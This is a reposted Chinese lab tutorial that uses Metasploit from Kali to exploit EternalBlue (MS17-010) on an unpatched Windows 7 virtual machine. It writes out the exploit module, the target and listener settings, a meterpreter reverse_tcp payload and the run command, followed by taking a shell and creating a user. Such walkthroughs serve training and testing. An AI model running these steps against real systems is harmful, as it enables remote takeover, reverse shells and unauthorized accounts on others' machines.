安基网 首页 安全 渗透测试 查看内容

kail对永恒之蓝漏洞做渗透测试(ms17-010)

2019-3-2 15:58| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 实验环境:首先先介绍ms17-0010 ms即微软。17代表2017年,010代表是第10个漏洞,即微软2017年的第10号漏洞kail虚拟机一台 ip地址:192.168.10.20kail 查看ip地址信息windows虚拟机一台 IP地址:192.168.10.80windows ...

实验环境:

首先先介绍ms17-0010 ms即微软。17代表2017年,010代表是第10个漏洞,即微软2017年的第10号漏洞

kail虚拟机一台 ip地址:192.168.10.20

kail 查看ip地址信息

windows虚拟机一台 IP地址:192.168.10.80

windows查看ip地址

(windows7未安装永恒之蓝ms17-010漏洞补丁)

kail中打开漏洞利用工具metasploit寻找漏洞

著名漏洞利用工具metasploit

打开metasploit

键入search ms17-010 寻找漏洞

搜索漏洞

use exploit/windows/smb/ms17_010_eternalblue 利用漏洞

利用漏洞

设置操作机ip和被攻击者ip

set rhost 192.168.10.80

set lhost 192.168.10.20

设置操作信息

安装一个tcp反向链接工具

set payload windows/x64/meterpreter/reverse_tcp

安装工具

执行run命令 进行攻击

执行攻击

当下方有WIN字样是代表攻击成功

执行shell拿取被攻击管理员Cmd权限

windows7被攻破拿到shell

非法创建用户

查看被攻击的文件信息



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6662137987268084231/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部